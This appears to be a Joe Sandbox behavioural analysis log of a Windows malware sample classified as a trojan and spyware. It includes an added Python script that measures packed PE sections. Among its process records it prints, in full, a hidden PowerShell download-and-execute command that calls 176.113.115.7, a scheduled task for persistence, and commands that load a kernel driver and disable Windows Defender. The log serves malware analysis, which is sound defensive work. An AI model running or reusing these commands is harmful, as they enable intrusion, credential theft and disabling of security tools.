Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: please18.exe.43.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: please18[1].43.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: Section: ZLIB complexity 0.9983697055785123
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: Section: gvjtyabe ZLIB complexity 0.9947297453703704
Source: rapes.exe.10.dr Static PE information: Section: ZLIB complexity 0.9983697055785123
Source: rapes.exe.10.dr Static PE information: Section: gvjtyabe ZLIB complexity 0.9947297453703704
Source: random[1].exe.21.dr Static PE information: Section: ZLIB complexity 0.9994582935750637
Source: 466f8e521c.exe.21.dr Static PE information: Section: ZLIB complexity 0.9994582935750637
Source: random[1].exe0.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003337967867232
Source: random[1].exe0.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003337967867232
Source: d6a397c01b.exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003337967867232
Source: d6a397c01b.exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003337967867232
Source: 7b35p_003[1].exe.21.dr Static PE information: Section: ds2 ZLIB complexity 0.9912089835934373
Source: 7b35p_003.exe.21.dr Static PE information: Section: ds2 ZLIB complexity 0.9912089835934373
Source: EPTwCQd.exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003250538020085
Source: EPTwCQd[1].exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003250538020085
Source: EPTwCQd.exe0.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003250538020085
Source: q4jfn3p[1].exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003622159090908
Source: q4jfn3p.exe.21.dr Static PE information: Section: .cSs ZLIB complexity 1.0003622159090908
Source: random[1].exe1.21.dr Static PE information: Section: ZLIB complexity 0.9998432046247818
Source: 466a80d633.exe.21.dr Static PE information: Section: ZLIB complexity 0.9998432046247818
Source: crypted.54[1].exe.43.dr Static PE information: Section: .cSs ZLIB complexity 1.0003622159090908
Source: crypted.exe.43.dr Static PE information: Section: .cSs ZLIB complexity 1.0003622159090908
Source: v7942[1].exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003622159090908
Source: v7942.exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003622159090908
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003236607142858
Source: alex1dskfmdsf.exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003236607142858
Source: f4d01cf3f8.exe.43.dr Static PE information: Section: ZLIB complexity 0.9994582935750637
Source: 01ea7855d3.exe.43.dr Static PE information: Section: ZLIB complexity 0.9998432046247818
Source: gron12321[1].exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003337967867232
Source: gron12321.exe.43.dr Static PE information: Section: .idata ZLIB complexity 1.0003337967867232
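The ZLIB complexity values above are a packing/encryption triage metric: a section whose bytes compress to roughly their own size (values near or above 1.0, as for the .cSs and .idata sections here) is carrying encrypted or already-compressed data, which is typical of a packer stub, whereas ordinary code and data compress well. As an added example, not part of the Joe Sandbox report, the script below walks a PE section table and reproduces the metric per section; it assumes the metric is compressed size over raw size at zlib level 9, and the minimal PE builder is a constructed fixture (no optional header, no alignment, not loadable) so the walker can run offline.

```python
"""Reproduce the per-section "ZLIB complexity" triage metric from this report.

Added example, not part of the Joe Sandbox report. The metric is assumed to be
compressed_size / raw_size of each section's file bytes. build_sample_pe() is a
constructed fixture (no optional header, no alignment, not loadable), only
there so the section walker can be exercised offline.
"""
import hashlib
import struct
import zlib

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = struct.Struct("<HHIIIHH")         # IMAGE_FILE_HEADER, 20 bytes


def iter_sections(pe: bytes):
    """Yield (name, raw_bytes, characteristics) by walking MZ -> PE -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsec, _, _, _, opt_size, _ = COFF_HDR.unpack_from(pe, e_lfanew + 4)
    off = e_lfanew + 4 + COFF_HDR.size + opt_size
    for i in range(nsec):
        (name, _vsize, _vaddr, rawsize, rawptr,
         _, _, _, _, chars) = SECTION_HDR.unpack_from(pe, off + i * SECTION_HDR.size)
        yield name.rstrip(b"\0").decode("latin-1"), pe[rawptr:rawptr + rawsize], chars


def zlib_complexity(data: bytes) -> float:
    """compressed/raw ratio: ~0 for zero-fill, >1.0 for encrypted or packed bytes
    (deflate falls back to stored blocks and adds header/checksum overhead)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def section_complexity(pe: bytes):
    """Map section name -> zlib complexity for every section in the file."""
    return {name: zlib_complexity(raw) for name, raw, _ in iter_sections(pe)}


def packed_sections(pe: bytes, threshold: float = 0.95):
    """Names of sections whose bytes are (nearly) incompressible, as the report flags them."""
    return [n for n, r in section_complexity(pe).items() if r >= threshold]


def _pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic incompressible bytes (SHA-256 chain) standing in for a packed stub."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def build_sample_pe(sections):
    """Constructed fixture: MZ stub, PE signature, COFF header with no optional
    header, then the section table followed directly by the section bodies."""
    e_lfanew = 0x40
    coff = COFF_HDR.pack(0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 4 + COFF_HDR.size + SECTION_HDR.size * len(sections)
    table, body, vaddr = b"", b"", 0x1000
    for name, data, chars in sections:
        table += SECTION_HDR.pack(name.encode().ljust(8, b"\0"), len(data), vaddr,
                                  len(data), raw_ptr, 0, 0, 0, 0, chars)
        body += data
        raw_ptr += len(data)
        vaddr += (len(data) + 0xFFF) & ~0xFFF
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    return dos + b"PE\0\0" + coff + table + body


# Constructed sample: plain code, a packed-looking .cSs section (name taken from the
# report), and zero-filled data. Characteristics are the usual CODE/EXECUTE/READ flags.
SAMPLE_PE = build_sample_pe([
    (".text", b"\x90" * 0x400 + b"\xC3", 0x60000020),
    (".cSs", _pseudo_random(0x2000), 0xE0000020),
    (".data", b"\0" * 0x800, 0xC0000040),
])

if __name__ == "__main__":
    for name, ratio in section_complexity(SAMPLE_PE).items():
        print(f"{name:8s} zlib complexity {ratio:.4f}")
    print("packed:", packed_sections(SAMPLE_PE))
```

To triage a dropped file, pass `open(path, "rb").read()` to `packed_sections`; a threshold of about 0.95 separates the 0.99 to 1.0003 values in this report from normal code, which usually sits well below 0.7.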
Source: please18.exe.43.dr, Cw53Jay.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: please18[1].43.dr, Cw53Jay.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@163/84@0/24
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E537B5 GetLastError,FormatMessageW, 0_2_00E537B5
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E410BF AdjustTokenPrivileges,CloseHandle, 0_2_00E410BF
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00E416C3
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00E551CD
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E6A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00E6A67C
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00E5648E
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00DE42A2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\EPTwCQd[1].exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3804:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4988:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe File created: C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta Jump to behavior
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4F33.tmp\4F34.tmp\4F35.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: Af3hqfTjFh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 0000002D.00000002.1848052585.00005B0401B89000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777724775.00005B0400F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777757098.00005B0400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842834875.00005B0401534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
Source: chrome.exe, 0000002D.00000002.1773692729.00005B0400AD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
Source: chrome.exe, 0000002D.00000002.1848052585.00005B0401B89000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777724775.00005B0400F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1777757098.00005B0400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1842834875.00005B0401534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
Source: chrome.exe, 0000002D.00000002.1847286595.00005B04019F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
Source: v3w47qi58.27.dr, cjwbaas0h.27.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
Source: chrome.exe, 0000002D.00000003.1716968808.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1847671459.00005B0401A88000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';tic.com
Source: chrome.exe, 0000002D.00000002.1847835777.00005B0401B3C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
Source: Af3hqfTjFh.exe Virustotal: Detection: 49%
Source: Af3hqfTjFh.exe ReversingLabs: Detection: 52%
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: " /add
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: " /add /y
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: " /add
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: " /add /y
Source: rapes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe String found in binary or memory: " /add
Source: rapes.exe String found in binary or memory: " /add /y
Source: unknown Process created: C:\Users\user\Desktop\Af3hqfTjFh.exe "C:\Users\user\Desktop\Af3hqfTjFh.exe"
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe "C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe"
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe "C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe"
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe "C:\Users\user\AppData\Local\Temp\10351780101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4F33.tmp\4F34.tmp\4F35.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\504C.tmp\504D.tmp\504E.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe "C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe"
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2284,i,14052270885634350460,10056788384925105811,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2484 /prefetch:3
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe "C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe "C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe "C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe "C:\Users\user\AppData\Local\Temp\10351780101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe "C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe"
